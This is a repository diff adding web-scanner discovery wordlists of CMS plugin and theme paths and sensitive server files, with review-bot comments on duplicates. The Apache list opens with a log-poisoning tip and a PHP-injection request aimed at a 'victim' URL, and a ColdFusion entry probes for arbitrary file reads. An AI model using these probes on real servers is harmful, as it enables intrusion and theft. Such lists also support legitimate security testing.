themes/siberia/
|
||||
themes/simpla/
|
||||
themes/simple/
|
||||
themes/simple_blog/
|
||||
themes/simple_web/
|
||||
themes/simplefolio/
|
||||
themes/simpler/
|
||||
themes/simplex/
|
||||
themes/simplex2/
|
||||
themes/simplicity/
|
||||
themes/simply_modern/
|
||||
themes/simplygreen/
|
||||
themes/sinatra/
|
||||
themes/sitebrowser_basic/
|
||||
themes/sk8/
|
||||
themes/sketchit/
|
||||
themes/sky/
|
||||
themes/skyline/
|
||||
themes/skyliner/
|
||||
themes/skymod/
|
||||
themes/skyroots/
|
||||
themes/slash/
|
||||
themes/slashin/
|
||||
themes/slate
|
||||
themes/slate/
|
||||
themes/slurpee/
|
||||
themes/smarty/
|
||||
themes/smashing_dilectio/
|
||||
themes/smoothBlue/
|
||||
themes/smooth_blue/
|
||||
themes/snd/
|
||||
themes/soccer/
|
||||
themes/social/
|
||||
themes/sodelicious/
|
||||
themes/softwhite/
|
||||
themes/solarflare/
|
||||
themes/soldier/
|
||||
themes/solemnity/
|
||||
themes/solon/
|
||||
themes/somethingspecial/
|
||||
themes/sonbol/
|
||||
themes/sor/
|
||||
themes/splender/
|
||||
themes/spooner/
|
||||
themes/sports/
|
||||
themes/spreadfirefox/
|
||||
themes/spring/
|
||||
themes/spring_bloom/
|
||||
themes/spring_theme/
|
||||
themes/stark
|
||||
themes/stark/
|
||||
themes/starkish/
|
||||
themes/stilton/
|
||||
themes/strange_little_town/
|
||||
themes/strix/
|
||||
themes/studio/
|
||||
themes/stylebox/
|
||||
themes/styleswitcher/
|
||||
themes/stylized_beauty/
|
||||
themes/summerholiday/
|
||||
themes/summertime/
|
||||
themes/sunflower/
|
||||
themes/sunny_sky/
|
||||
themes/sunset/
|
||||
themes/superclean/
|
||||
themes/supriya/
|
||||
themes/surface/
|
||||
themes/sussex/
|
||||
themes/sweethome/
|
||||
themes/sympal_theme/
|
||||
themes/synfox/
|
||||
themes/tableless/
|
||||
themes/tal_grey/
|
||||
themes/tapestry/
|
||||
themes/tarski/
|
||||
themes/tattler_theme/
|
||||
themes/tech/
|
||||
themes/teh/
|
||||
themes/teleology/
|
||||
themes/templist/
|
||||
themes/tendu/
|
||||
themes/terrafirma/
|
||||
themes/terrafirma_theme/
|
||||
themes/test/
|
||||
themes/texas/
|
||||
themes/themename/
|
||||
themes/themes/
|
||||
themes/themetastic/
|
||||
themes/thirteen/
|
||||
themes/tinsel/
|
||||
themes/tivity/
|
||||
themes/tma/
|
||||
themes/toasted/
|
||||
themes/touch/
|
||||
themes/tranquility/
|
||||
themes/travel/
|
||||
themes/treedesert/
|
||||
themes/trillian
|
||||
themes/trillian/
|
||||
themes/trip/
|
||||
themes/triumviratum/
|
||||
themes/turquoise/
|
||||
themes/twilight/
|
||||
themes/twittish/
|
||||
themes/typography_paramount/
|
||||
themes/typoversicol/
|
||||
themes/ubiquity/
|
||||
themes/udtheme/
|
||||
themes/ufutbol/
|
||||
themes/ultimate960/
|
||||
themes/uncomplicated/
|
||||
themes/unconed
|
||||
themes/unconed/
|
||||
themes/untheme/
|
||||
themes/unthemes/
|
||||
themes/vertigo/
|
||||
themes/vigilianty/
|
||||
themes/vineyard/
|
||||
themes/vitzo/
|
||||
themes/vitzo_flex/
|
||||
themes/voodoo/
|
||||
themes/voodoo_dolly/
|
||||
themes/votebob/
|
||||
themes/wabi/
|
||||
themes/waffles/
|
||||
themes/wall/
|
||||
themes/warmy/
|
||||
themes/warped/
|
||||
themes/web110/
|
||||
themes/webchick/
|
||||
themes/wgbluemarine/
|
||||
themes/whatsinitsname/
|
||||
themes/whatsyoursolution/
|
||||
themes/wilderness/
|
||||
themes/winter_wonderland/
|
||||
themes/wireframe/
|
||||
themes/wowtheme/
|
||||
themes/wyo/
|
||||
themes/xsilver/
|
||||
themes/xtemplate/
|
||||
themes/xwebAeon4/
|
||||
themes/yaroon
|
||||
themes/yaroon/
|
||||
themes/yarooned/
|
||||
themes/yast/
|
||||
themes/yui-framework/
|
||||
themes/yui/
|
||||
themes/yui_grid/
|
||||
themes/zen/
|
||||
themes/zen_basic/
|
||||
themes/zen_deleon2/
|
||||
themes/zen_midnight/
|
||||
themes/zen_ninesixty/
|
||||
themes/zen_twilight/
|
||||
themes/zenland/
|
||||
themes/zental/
|
||||
themes/zenzen/
|
||||
themes/zeropoint/
|
||||
themes/zilo_blog/
|
||||
themes/zubrick/
|
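Review bot: Some names in this list are present both with and without a trailing slash (`themes/bluemarine` and `themes/bluemarine/`, likewise chameleon, garland, goofy, jeroen, marvin, pushbutton, seven, slate, stark, trillian, unconed, yaroon) while every other entry has only the slash form, and nothing in the file says why. If the bare forms are intentional, say so in the readme; otherwise normalise to one form so scanners that append their own slash do not request the same directory twice.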
224
discovery/generic/cms/joomla_plugins.txt
Normal file
|
@ -0,0 +1,224 @@
|
|||
components/com_acajoom/
|
||||
components/com_aclassf/
|
||||
components/com_acmisc/
|
||||
components/com_adsmanager/
|
||||
components/com_agora/
|
||||
components/com_ajaxchat/
|
||||
components/com_akogallery/
|
||||
components/com_album/
|
||||
components/com_allvideosreloaded/
|
||||
components/com_alphauserpoints/
|
||||
components/com_aprice/
|
||||
components/com_artportal/
|
||||
components/com_avreloaded/
|
||||
components/com_banners/
|
||||
components/com_bfsurvey_basic/
|
||||
components/com_booklibrary/
|
||||
components/com_bookmarks/
|
||||
components/com_carman/
|
||||
components/com_cartikads/
|
||||
components/com_casino/
|
||||
components/com_cbresumebuilder/
|
||||
components/com_chatroom/
|
||||
components/com_ckforms/
|
||||
components/com_comment/
|
||||
components/com_comprofiler/
|
||||
components/com_contact/
|
||||
components/com_contactus/
|
||||
components/com_content/
|
||||
components/com_ContentBlogList/
|
||||
components/com_cronjobs/
|
||||
components/com_customquickicons/
|
||||
components/com_dhforum/
|
||||
components/com_digifolio/
|
||||
components/com_digistore/
|
||||
components/com_djcatalog/
|
||||
components/com_dm_orders/
|
||||
components/com_docman/
|
||||
components/com_doqment/
|
||||
components/com_easygallery/
|
||||
components/com_easygb/
|
||||
components/com_easygb2/
|
||||
components/com_eventlist/
|
||||
components/com_events/
|
||||
components/com_extplorer/
|
||||
components/com_ezine/
|
||||
components/com_ezrealty/
|
||||
components/com_facebook/
|
||||
components/com_facileforms/
|
||||
components/com_fastball/
|
||||
components/com_favourites/
|
||||
components/com_fireboard/
|
||||
components/com_flickr4j/
|
||||
components/com_foobla_suggestions/
|
||||
components/com_form/
|
||||
components/com_forum/
|
||||
components/com_frontpage/
|
||||
components/com_games/
|
||||
components/com_gameserver/
|
||||
components/com_gcalendar/
|
||||
components/com_groups/
|
||||
components/com_hbssearch/
|
||||
components/com_hiscat/
|
||||
components/com_icrmbasic/
|
||||
components/com_idoblog/
|
||||
components/com_intuit/
|
||||
components/com_intuitLocal/
|
||||
components/com_invite/
|
||||
components/com_jabode/
|
||||
components/com_jbook/
|
||||
components/com_jbudgetsmagic/
|
||||
components/com_jcalpro/
|
||||
components/com_jce/
|
||||
components/com_jcomments/
|
||||
components/com_jeemaarticlecollection/
|
||||
components/com_jinc/
|
||||
components/com_jmovies/
|
||||
components/com_job/
|
||||
components/com_jomcomment/
|
||||
components/com_joomap/
|
||||
components/com_joomfish/
|
||||
components/com_joomlapack/
|
||||
components/com_joomlastats/
|
||||
components/com_joomlaxplorer/
|
||||
components/com_joomportfolio/
|
||||
components/com_joomunity/
|
||||
components/com_j-projects/
|
||||
components/com_jreservation/
|
||||
components/com_jshop/
|
||||
components/com_jsjobs/
|
||||
components/com_jtips/
|
||||
components/com_juser/
|
||||
components/com_kide/
|
||||
components/com_letterman/
|
||||
components/com_livechat/
|
||||
components/com_login/
|
||||
components/com_mailto/
|
||||
components/com_media/
|
||||
components/com_messages/
|
||||
components/com_messenger/
|
||||
components/com_Mochigames/
|
||||
components/com_morfeoshow/
|
||||
components/com_moschat/
|
||||
components/com_mosres/
|
||||
components/com_mytube/
|
||||
components/com_network/
|
||||
components/com_newsfeeds/
|
||||
components/com_ninjacentral/
|
||||
components/com_omphotogallery/
|
||||
components/com_oprykningspoint_mc/
|
||||
components/com_otzivi/
|
||||
components/com_page/
|
||||
components/com_parainvite/
|
||||
components/com_paxxgallery/
|
||||
components/com_perchagallery/
|
||||
components/com_personel/
|
||||
components/com_photo/
|
||||
components/com_photoblog/
|
||||
components/com_places/
|
||||
components/com_poll/
|
||||
components/com_ponygallery/
|
||||
components/com_privmsgs/
|
||||
components/com_proofreader/
|
||||
components/com_qcache/
|
||||
components/com_rate/
|
||||
components/com_rating/
|
||||
components/com_registration/
|
||||
components/com_rsform/
|
||||
components/com_rsgallery2/
|
||||
components/com_rss/
|
||||
components/com_schools/
|
||||
components/com_search/
|
||||
components/com_sef/
|
||||
components/com_sef/
|
||||
components/com_seminar/
|
||||
components/com_seyret/
|
||||
components/com_shoutbox/
|
||||
components/com_siirler/
|
||||
components/com_simple_review/
|
||||
components/com_simpleshop/
|
||||
components/com_sobi2/
|
||||
components/com_soundset/
|
||||
components/com_sportfusion/
|
||||
components/com_store/
|
||||
components/com_subscribe/
|
||||
components/com_surveymanager/
|
||||
components/com_swmenufree/
|
||||
components/com_thumbnailpro/
|
||||
components/com_tpjobs/
|
||||
components/com_trabalhe_conosco/
|
||||
components/com_tupinambis/
|
||||
components/com_user/
|
||||
components/com_users/
|
||||
components/com_virtualkiss/
|
||||
components/com_virtuemart/
|
||||
components/com_vxdate/
|
||||
components/com_webcamxp/
|
||||
components/com_weblinks/
|
||||
components/com_weblogs/
|
||||
components/com_wrapper/
|
||||
components/com_wrapper/
|
||||
components/com_wrapper/
|
||||
components/com_xmap/
|
||||
components/com_zcalendar/
|
||||
components/js_relevant/
|
||||
modules/mod_adscroller/
|
||||
modules/mod_archive/
|
||||
modules/mod_articles_archive/
|
||||
modules/mod_articles_category/
|
||||
modules/mod_articles_latest/
|
||||
modules/mod_articles_news/
|
||||
modules/mod_articles_popular/
|
||||
modules/mod_banners/
|
||||
modules/mod_breadcrumbs/
|
||||
modules/mod_briaskISS/
|
||||
modules/mod_ccnewsletter/
|
||||
modules/mod_custom/
|
||||
modules/mod_dn/
|
||||
modules/mod_feed/
|
||||
modules/mod_filterednews/
|
||||
modules/mod_flashmod/
|
||||
modules/mod_footer/
|
||||
modules/mod_forme/
|
||||
modules/mod_gk_news_image/
|
||||
modules/mod_internetradio/
|
||||
modules/mod_internetradio2/
|
||||
modules/mod_jabulletin/
|
||||
modules/mod_janewsflash/
|
||||
modules/mod_ja_slwi/
|
||||
modules/mod_jms_support/
|
||||
modules/mod_latestnews/
|
||||
modules/mod_login/
|
||||
modules/mod_mainmenu/
|
||||
modules/mod_menu/
|
||||
modules/mod_minifrontpage/
|
||||
modules/mod_mostread/
|
||||
modules/mod_newsflash/
|
||||
modules/mod_onlineusers/
|
||||
modules/mod_onlineusers_pro/
|
||||
modules/mod_poll/
|
||||
modules/mod_product_categories/
|
||||
modules/mod_productscroller/
|
||||
modules/mod_random_image/
|
||||
modules/mod_related_items/
|
||||
modules/mod_rokslideshow/
|
||||
modules/mod_rsform/
|
||||
modules/mod_search/
|
||||
modules/mod_sections/
|
||||
modules/mod_skychat/
|
||||
modules/mod_sobi2simplefeatured/
|
||||
modules/mod_sobidropdown/
|
||||
modules/mod_stats/
|
||||
modules/mod_swmenufree/
|
||||
modules/mod_syndicate/
|
||||
modules/mod_tcimageslider/
|
||||
modules/mod_users_latest/
|
||||
modules/mod_virtuemart/
|
||||
modules/mod_virtuemart_search/
|
||||
modules/mod_virtuemart_topten/
|
||||
modules/mod_vvisit_counter/
|
||||
modules/mod_weblinks/
|
||||
modules/mod_whosonline/
|
||||
modules/mod_woodychat/
|
||||
modules/mod_wrapper/
|
||||
modules/shoutbox/
|
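Review bot: `components/com_sef/` is listed twice and `components/com_wrapper/` three times, so any tool that walks this file repeats those requests and double-counts the hits; drop the repeats so that each path appears once. Separately, `components/js_relevant/` is the only `components/` entry without the `com_` prefix, and the same name appears as `templates/js_relevant/` in joomla_themes.txt, so check whether it belongs in this file at all.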
30
discovery/generic/cms/joomla_themes.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
templates/abc/
|
||||
templates/atomic/
|
||||
templates/b59-tpl8/
|
||||
templates/beez/
|
||||
templates/carbon_07/
|
||||
templates/crub/
|
||||
templates/dm_arrow_red/
|
||||
templates/gk_eshoptrix_2/
|
||||
templates/gk_gomuproject/
|
||||
templates/gk_icki_sports/
|
||||
templates/gk_musictop/
|
||||
templates/ja_purity/
|
||||
templates/ja_rochea/
|
||||
templates/ja_teline_ii/
|
||||
templates/joomlaport_metro/
|
||||
templates/js_relevant/
|
||||
templates/mynxx_j15/
|
||||
templates/planets/
|
||||
templates/planetsv2/
|
||||
templates/rhuk_milkyway/
|
||||
templates/rt_hivemind_j15/
|
||||
templates/rt_mediamogul_essentials_j15/
|
||||
templates/rt_nexus_j15/
|
||||
templates/siteground99/
|
||||
templates/siteground-j15-14/
|
||||
templates/siteground-j15-68/
|
||||
templates/siteground-j15-86/
|
||||
templates/system/
|
||||
templates/yoo_phoenix/
|
||||
templates/yoo_waybeyond/
|
3
discovery/generic/cms/readme.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
# files generated with cms-explorer
|
||||
http://code.google.com/p/cms-explorer/
|
||||
use these for q&d but cms explorer does a lot more
|
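Review bot: The readme does not say which files in this directory it covers, which cms-explorer version produced them, or when they were generated, so a reader cannot judge how stale the plugin and theme lists are. Add one line per generated file with the generation date and tool version, and state that entries are paths relative to the CMS root.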
13366
discovery/generic/cms/wp_plugins.txt
Normal file
File diff suppressed because it is too large
3646
discovery/generic/cms/wp_themes.txt
Normal file
File diff suppressed because it is too large
2346
discovery/generic/interesting-dirs-kitchensink.txt
Normal file
File diff suppressed because it is too large
37
discovery/generic/interesting-files-apache-tomcat.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
/examples
|
||||
/examples/jsp/index.html
|
||||
/examples/jsp/snp/snoop.jsp
|
||||
/examples/jsp/source.jsp
|
||||
/examples/servlet/HelloWorldExample
|
||||
/examples/servlet/SnoopServlet
|
||||
/examples/servlet/TroubleShooter
|
||||
/examples/servlet/default/jsp/snp/snoop.jsp
|
||||
/examples/servlet/default/jsp/source.jsp
|
||||
/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample
|
||||
/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet
|
||||
/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter
|
||||
/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp
|
||||
/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp
|
||||
/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp
|
||||
/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp
|
||||
/examples/servlet/snoop
|
||||
/examples/servlets/index.html
|
||||
/jsp-examples
|
||||
/manager
|
||||
/servlet/default/
|
||||
/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif
|
||||
/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet
|
||||
/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/
|
||||
/servlet/org.apache.catalina.servlets.DefaultServlet/
|
||||
/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
|
||||
/servlet/org.apache.catalina.servlets.HTMLManagerServlet
|
||||
/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif
|
||||
/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet
|
||||
/servlet/org.apache.catalina.servlets.ManagerServlet
|
||||
/servlet/org.apache.catalina.servlets.SnoopAllServlet
|
||||
/servlet/org.apache.catalina.servlets.WebdavServlet/
|
||||
/tomcat-docs
|
||||
/webdav
|
||||
/webdav/index.html
|
||||
/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/
|
||||
/webdav/servlet/webdav/
|
46
discovery/generic/interesting-files-apache.txt
Normal file
|
@ -0,0 +1,46 @@
|
|||
# If logs are visible and there is a potential RFI, try to poison a logfile and include it.
|
||||
# poison req example:
|
||||
# http://victim/someurl/<?php%20phpinfo();?>/somepath/poisonreq.txt
|
||||
.htaccess
|
||||
.htaccess.bak
|
||||
.htpasswd
|
||||
.meta
|
||||
.web
|
||||
/apache/logs/access.log
|
||||
/apache/logs/access_log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/error_log
|
||||
/httpd/logs/access.log
|
||||
/httpd/logs/access_log
|
||||
/httpd/logs/error.log
|
||||
/httpd/logs/error_log
|
||||
/logs/access.log
|
||||
/logs/access.log
|
||||
/logs/error.log
|
||||
/logs/error_log
|
||||
access_log
|
||||
cgi
|
||||
cgi-bin
|
||||
cgi-pub
|
||||
cgi-script
|
||||
dummy
|
||||
error
|
||||
error_log
|
||||
htdocs
|
||||
httpd
|
||||
httpd.pid
|
||||
icons
|
||||
index.html
|
||||
logs
|
||||
manual
|
||||
phf
|
||||
printenv
|
||||
server-info
|
||||
server-status
|
||||
status
|
||||
test-cgi
|
||||
tmp
|
||||
~bin
|
||||
~ftp
|
||||
~nobody
|
||||
~root
|
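Review bot: `/logs/access.log` appears twice in a row and `/logs/access_log` is absent, although the `/apache/logs/` and `/httpd/logs/` groups each list both spellings and `/logs/error.log` is followed by `/logs/error_log`; the second entry was most likely meant to be `/logs/access_log`. The three `#` lines at the top are also not marked as comments anywhere a consumer would see, so a tool that reads the file line by line will request them as paths; document the comment convention in the readme or move the note there. The file also mixes rooted entries (`/logs/error.log`) with bare names (`cgi-bin`, `server-status`), which should be called out or made consistent.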
96
discovery/generic/interesting-files-coldfusion.txt
Normal file
|
@ -0,0 +1,96 @@
|
|||
/CFIDE/Administrator/
|
||||
/CFIDE/Administrator/Application.cfm
|
||||
/CFIDE/Administrator/index.cfm
|
||||
/CFIDE/Administrator/login.cfm
|
||||
/CFIDE/Application.cfm
|
||||
/CFIDE/adminapi/
|
||||
/CFIDE/adminapi/Application.cfm
|
||||
/CFIDE/adminapi/_datasource/
|
||||
/CFIDE/adminapi/_datasource/formatjdbcurl.cfm
|
||||
/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm
|
||||
/CFIDE/adminapi/_datasource/geturldefaults.cfm
|
||||
/CFIDE/adminapi/_datasource/setdsn.cfm
|
||||
/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm
|
||||
/CFIDE/adminapi/_datasource/setsldatasource.cfm
|
||||
/CFIDE/adminapi/administrator.cfc
|
||||
/CFIDE/adminapi/base.cfc
|
||||
/CFIDE/adminapi/customtags/
|
||||
/CFIDE/adminapi/customtags/l10n.cfm
|
||||
/CFIDE/adminapi/customtags/resources
|
||||
/CFIDE/adminapi/customtags/resources/
|
||||
/CFIDE/adminapi/datasource.cfc
|
||||
/CFIDE/adminapi/debugging.cfc
|
||||
/CFIDE/adminapi/eventgateway.cfc
|
||||
/CFIDE/adminapi/extensions.cfc
|
||||
/CFIDE/adminapi/mail.cfc
|
||||
/CFIDE/adminapi/runtime.cfc
|
||||
/CFIDE/adminapi/security.cfc
|
||||
/CFIDE/classes/
|
||||
/CFIDE/classes/cf-j2re-win.cab
|
||||
/CFIDE/classes/cfapplets.jar
|
||||
/CFIDE/classes/images
|
||||
/CFIDE/componentutils/
|
||||
/CFIDE/componentutils/Application.cfm
|
||||
/CFIDE/componentutils/_component_cfcToHTML.cfm
|
||||
/CFIDE/componentutils/_component_cfcToMCDL.cfm?
|
||||
/CFIDE/componentutils/_component_style.cfm
|
||||
/CFIDE/componentutils/_component_utils.cfm
|
||||
/CFIDE/componentutils/cfcexplorer.cfc
|
||||
/CFIDE/componentutils/cfcexplorer_utils.cfm
|
||||
/CFIDE/componentutils/componentdetail.cfm
|
||||
/CFIDE/componentutils/componentdoc.cfm
|
||||
/CFIDE/componentutils/componentlist.cfm
|
||||
/CFIDE/componentutils/gatewaymenu
|
||||
/CFIDE/componentutils/gatewaymenu/
|
||||
/CFIDE/componentutils/gatewaymenu/menu.cfc
|
||||
/CFIDE/componentutils/gatewaymenu/menunode.cfc
|
||||
/CFIDE/componentutils/login.cfm
|
||||
/CFIDE/componentutils/packagelist.cfm
|
||||
/CFIDE/componentutils/utils.cfc
|
||||
/CFIDE/debug/
|
||||
/CFIDE/debug/images/
|
||||
/CFIDE/debug/includes/
|
||||
/CFIDE/images/
|
||||
/CFIDE/images/skins/
|
||||
/CFIDE/install.cfm
|
||||
/CFIDE/installers/
|
||||
/CFIDE/installers/CFMX7DreamWeaverExtensions.mxp
|
||||
/CFIDE/installers/CFReportBuilderInstaller.exe
|
||||
/CFIDE/probe.cfm
|
||||
/CFIDE/scripts/
|
||||
/CFIDE/scripts/css/
|
||||
/CFIDE/scripts/xsl/
|
||||
/CFIDE/wizards/
|
||||
/CFIDE/wizards/common/
|
||||
/CFIDE/wizards/common/utils.cfc
|
||||
/cfappman/index.cfm
|
||||
/cfdocs/MOLE.CFM
|
||||
/cfdocs/TOXIC.CFM
|
||||
/cfdocs/cfmlsyntaxcheck.cfm
|
||||
/cfdocs/exampleapp/docs/sourcewindow.cfm
|
||||
/cfdocs/exampleapp/email/application.cfm
|
||||
/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
|
||||
/cfdocs/exampleapp/publish/admin/addcontent.cfm
|
||||
/cfdocs/exampleapp/publish/admin/application.cfm
|
||||
/cfdocs/examples/cvbeans/beaninfo.cfm
|
||||
/cfdocs/examples/parks/detail.cfm
|
||||
/cfdocs/expeval/displayopenedfile.cfm
|
||||
/cfdocs/expeval/eval.cfm
|
||||
/cfdocs/expeval/exprcalc.cfm
|
||||
/cfdocs/expeval/openfile.cfm
|
||||
/cfdocs/expeval/sendmail.cfm
|
||||
/cfdocs/expressions.cfm
|
||||
/cfdocs/root.cfm
|
||||
/cfdocs/snippets/evaluate.cfm
|
||||
/cfdocs/snippets/fileexists.cfm
|
||||
/cfdocs/snippets/gettempdirectory.cfm
|
||||
/cfdocs/snippets/viewexample.cfm
|
||||
/cfdocs/zero.cfm
|
||||
/cfusion/cfapps/forums/data/forums.mdb
|
||||
/cfusion/cfapps/forums/forums_.mdb
|
||||
/cfusion/cfapps/security/data/realm.mdb
|
||||
/cfusion/cfapps/security/realm_.mdb
|
||||
/cfusion/database/cfexamples.mdb
|
||||
/cfusion/database/cfsnippets.mdb
|
||||
/cfusion/database/cypress.mdb
|
||||
/cfusion/database/smpolicy.mdb
|
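Review bot: Two entries carry query-string residue in a list that is otherwise plain paths: `/CFIDE/componentutils/_component_cfcToMCDL.cfm?` ends in a bare `?`, and `/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini` embeds a parameter value. Consumers that URL-encode each line, or that match responses per path, will treat these differently from the rest, so either trim them to the path and keep parameterised requests in a separate file, or note in the readme that entries may include a query string.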
578
discovery/generic/interesting-files-hyperion.txt
Normal file
|
@ -0,0 +1,578 @@
|
|||
/HFM/
|
||||
/HFM/Administration
|
||||
/HFM/Administration/ManageServersAndApplications.asp
|
||||
/HFM/Administration/RunningTasks.asp
|
||||
/HFM/Administration/ShowRunningTaskLog.asp
|
||||
/HFM/Administration/TaskAudit.asp
|
||||
/HFM/Administration/TaskAuditExport.asp
|
||||
/HFM/Administration/TaskProgress.asp
|
||||
/HFM/Administration/UsersOnSystem.asp
|
||||
/HFM/Calcman
|
||||
/HFM/Calcman/convxmltovbs.asp
|
||||
/HFM/Central
|
||||
/HFM/Central/Preferences
|
||||
/HFM/Central/Preferences/DefaultUserPreferences.asp
|
||||
/HFM/Central/Tasks
|
||||
/HFM/Central/Tasks/DisplayServers.asp
|
||||
/HFM/Central/Tasks/SelectApplication.asp
|
||||
/HFM/Central/Util
|
||||
/HFM/Central/Util//HFMCentralConstants.asp
|
||||
/HFM/Central/Util/HTML.asp
|
||||
/HFM/Central/Util/Launch/HFM.asp
|
||||
/HFM/Central/Util/ManageApplication.asp
|
||||
/HFM/Central/Util/VerifyUserOnApplication.asp
|
||||
/HFM/Common
|
||||
/HFM/Common/AdminUtility.asp
|
||||
/HFM/Common/Alerts.asp
|
||||
/HFM/Common/Async.asp
|
||||
/HFM/Common/Bottom.asp
|
||||
/HFM/Common/Calendar.asp
|
||||
/HFM/Common/CalendarPopup.asp
|
||||
/HFM/Common/ContextMenuSupport.asp
|
||||
/HFM/Common/CookieConstants.asp
|
||||
/HFM/Common/Core.asp
|
||||
/HFM/Common/Document.Asp
|
||||
/HFM/Common/Empty.html
|
||||
/HFM/Common/ErrorDetails.asp
|
||||
/HFM/Common/ErrorLog.asp
|
||||
/HFM/Common/FDMIntegrationUtil.asp
|
||||
/HFM/Common/FileAccess.asp
|
||||
/HFM/Common/GeneralUI.asp
|
||||
/HFM/Common/GlobalFunctions.asp
|
||||
/HFM/Common/HorzNav.asp
|
||||
/HFM/Common/HsvJSConstantsServer_Common.asp
|
||||
/HFM/Common/InlineComponentSupport.asp
|
||||
/HFM/Common/JSClientConstants.asp
|
||||
/HFM/Common/LogonOpenApp.asp
|
||||
/HFM/Common/Message.asp
|
||||
/HFM/Common/MessageDisplayFunctions.asp
|
||||
/HFM/Common/Metadata.asp
|
||||
/HFM/Common/MsgBox.Asp
|
||||
/HFM/Common/NumberStringsJavaScript.asp
|
||||
/HFM/Common/PopupBanners.asp
|
||||
/HFM/Common/POVFunctions.asp
|
||||
/HFM/Common/ProcessManagementConstants.asp
|
||||
/HFM/Common/ProdNav.asp
|
||||
/HFM/Common/Redirect.asp
|
||||
/HFM/Common/ResourceManager.xslt
|
||||
/HFM/Common/Resources.xslt
|
||||
/HFM/Common/ReSubmitWithPost.asp
|
||||
/HFM/Common/RoleIdsToResourceIds.xslt
|
||||
/HFM/Common/SecurityConstants.asp
|
||||
/HFM/Common/SecurityOptions.asp
|
||||
/HFM/Common/StringConstants.asp
|
||||
/HFM/Common/TabFunctions.asp
|
||||
/HFM/Common/TaskBoxUI.asp
|
||||
/HFM/Common/UserPOV.asp
|
||||
/HFM/Common/Utilities.asp
|
||||
/HFM/Common/WrkspcFuncs.asp
|
||||
/HFM/Common/XMLFunctions.asp
|
||||
/HFM/Common/XMLMetadata.asp
|
||||
/HFM/Common/XmlSsnState.asp
|
||||
/HFM/ConsolTemplate
|
||||
/HFM/ConsolTemplate/ConsolTemplate.asp
|
||||
/HFM/ConsolTemplate/ProcessTreeConsolTemplate.asp
|
||||
/HFM/CreateApp
|
||||
/HFM/CreateApp/CreateApp.asp
|
||||
/HFM/CreateApp/ProcessCreate.asp
|
||||
/HFM/Data
|
||||
/HFM/Data/AsyncPMAlert.asp
|
||||
/HFM/Data/CellHistory.asp
|
||||
/HFM/Data/DataAudit.asp
|
||||
/HFM/Data/DataAuditExport.asp
|
||||
/HFM/Data/DataExplorerCellAdjustments.asp
|
||||
/HFM/Data/DataExplorerCellInformation.asp
|
||||
/HFM/Data/DataExplorerCellText.asp
|
||||
/HFM/Data/DataExplorerGridDefPOVtoMbrSelPOV.xsl
|
||||
/HFM/Data/DataExplorerGridDefUpgrade.asp
|
||||
/HFM/Data/DataExplorerGridSettings.asp
|
||||
/HFM/Data/DataExplorerLineItemDetail.asp
|
||||
/HFM/Data/DataExplorerManageProcess.asp
|
||||
/HFM/Data/DataExplorerMbrSel.asp
|
||||
/HFM/Data/DataExplorerTransactions.asp
|
||||
/HFM/Data/DataExplorerUnassignedGroups.asp
|
||||
/HFM/Data/DataExplorerUserPOVSupport.asp
|
||||
/HFM/Data/DataGridCalcEPU.asp
|
||||
/HFM/Data/DBManagementClearData.asp
|
||||
/HFM/Data/DBManagementCopyData.asp
|
||||
/HFM/Data/DBManagementDeleteInvalidRecords.asp
|
||||
/HFM/Data/DBManagementObjects.asp
|
||||
/HFM/Data/DisplayColumns.asp
|
||||
/HFM/Data/EntityDetails.asp
|
||||
/HFM/Data/ExploreData.asp
|
||||
/HFM/Data/ExploreDataJava.asp
|
||||
/HFM/Data/FormInstructions.asp
|
||||
/HFM/Data/FormViewDef.asp
|
||||
/HFM/Data/HsvJSConstantsServer_Data.asp
|
||||
/HFM/Data/HsvJSConstantsServer_ProcFlow.asp
|
||||
/HFM/Data/ImportWDEFFromExcel.asp
|
||||
/HFM/Data/LineItems.asp
|
||||
/HFM/Data/MultiPhaseOptions.asp
|
||||
/HFM/Data/MultiPhaseProcessControlPanelColOptions.asp
|
||||
/HFM/Data/MultiPhaseProcessControlPanelRowOptions.asp
|
||||
/HFM/Data/OverlappedConsolidationInfo.asp
|
||||
/HFM/Data/PhaseOptions.asp
|
||||
/HFM/Data/PostToAuditIntersectionUrl.asp
|
||||
/HFM/Data/ProcessControlEmail.xsl
|
||||
/HFM/Data/ProcessControlMultiPanelFlowManagement.asp
|
||||
/HFM/Data/ProcessControlPanel.asp
|
||||
/HFM/Data/ProcessControlPanelCalcSummary.asp
|
||||
/HFM/Data/ProcessControlPanelFlowManagement.asp
|
||||
/HFM/Data/ProcessControlPanelMbrSel.asp
|
||||
/HFM/Data/ProcessControlPanelMulti.asp
|
||||
/HFM/Data/ProcessControlPanelMultiColOptions.asp
|
||||
/HFM/Data/ProcessControlPanelMultiMbrSel.asp
|
||||
/HFM/Data/ProcessControlPanelMultiRowOptions.asp
|
||||
/HFM/Data/ProcessControlPanelOptions.asp
|
||||
/HFM/Data/ProcessControlTask.asp
|
||||
/HFM/Data/ProcessDocMgrSaveWebGrid.asp
|
||||
/HFM/Data/ProcessEntityDetails.asp
|
||||
/HFM/Data/ProcessImportWDEFFromExcel.asp
|
||||
/HFM/Data/ProcessLineItems.asp
|
||||
/HFM/Data/ProcessProcFlowManagement.asp
|
||||
/HFM/Data/ProcessSummary.asp
|
